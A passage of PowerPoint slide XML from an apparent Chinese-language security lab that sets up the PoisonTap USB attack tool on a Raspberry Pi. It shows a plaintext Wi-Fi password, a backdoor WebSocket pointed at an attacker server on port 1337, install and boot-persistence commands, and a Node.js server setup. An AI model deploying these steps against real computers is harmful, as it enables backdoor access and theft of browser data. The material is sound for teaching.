            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>ctrl_interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>=DIR=/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>wpa_supplicant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> GROUP=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>netdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>update_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>country=TW </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>network={ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>ssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>="HSNG-A2.4" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>psk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>hsng@root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>}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635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6545C-191E-4654-8E58-5916F798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Raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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67107-3B4F-4C58-8C37-88412EBB0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安裝需要的檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> apt-get -y install git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>tmux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> vim telnet iptables screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>git clone https://github.com/samyk/poisontap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>cd poisontap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04873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6545C-191E-4654-8E58-5916F798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Raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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67107-3B4F-4C58-8C37-88412EBB0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/>
              <a:t>修改目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>至檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(backdoor.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>target_backdoor.js)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>var socket = new WebSocket('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>://&lt;IP&gt;:1337’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>編輯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>install.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>echo -e "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>nauto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> usb0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>nallow-hotplug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> usb0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>niface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> usb0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>inet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> static\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>taddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> 1.0.0.1\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>tnetmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> 0.0.0.0" &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/network/interfaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>dtoverlay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=dwc2" &gt;&gt; /boot/config.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>echo -e "dwc2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>ng_ether</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>" &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/modules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> sed --in-place "/exit 0/d" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>echo "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> /home/pi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>poisontap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/pi_startup.sh" &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> /home/pi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>poisontap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> -R pi /home/pi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>poisontap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>apt-get update &amp;&amp; apt-get upgrade </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>apt-get -y install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>isc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>dhcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>-server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>dsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>nodejs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>install.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> bash install.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3035230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6545C-191E-4654-8E58-5916F798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Raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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67107-3B4F-4C58-8C37-88412EBB0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/>
              <a:t>編輯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>pi_startup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>ls /sys/class/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>udc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> &gt; UDC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>改成 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>name="$(ls /sys/class/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>udc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>)" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>echo "$name" &gt;UDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>dhcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> cp -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dhcpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dhcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dhcpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>編輯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>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rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，將原本中間的刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t># Print the IP address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> /home/pi/poisontap/pi_startup.sh </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88641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F3678-ED7E-42A9-ACAB-8A3620C9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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>端設定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51C5E9-B1C6-404B-8D86-DAEFE8C2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dirty="0"/>
              <a:t>請使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>LAB2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>給大家的帳號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查詢版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> -m)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nodejs.org/en/download/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下載對應版本，在對應的按鈕右鍵複製連結網址，從該網址下載</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> https://nodejs.org/dist/v16.15.0/node-v16.15.0-linux-x64.tar.xz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>解壓縮檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> node-v16.15.0-linux-armv7l.tar.xz </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>cd node-v16.15.0-linux-armv7l/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>複製檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> cp -R * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>/local/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>更新版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> install -g npm@8.10.0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5859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F3678-ED7E-42A9-ACAB-8A3620C9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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>端設定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51C5E9-B1C6-404B-8D86-DAEFE8C2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dirty="0"/>
              <a:t>下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下載需要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>package</a:t>
            </a:r>
          </a:p>
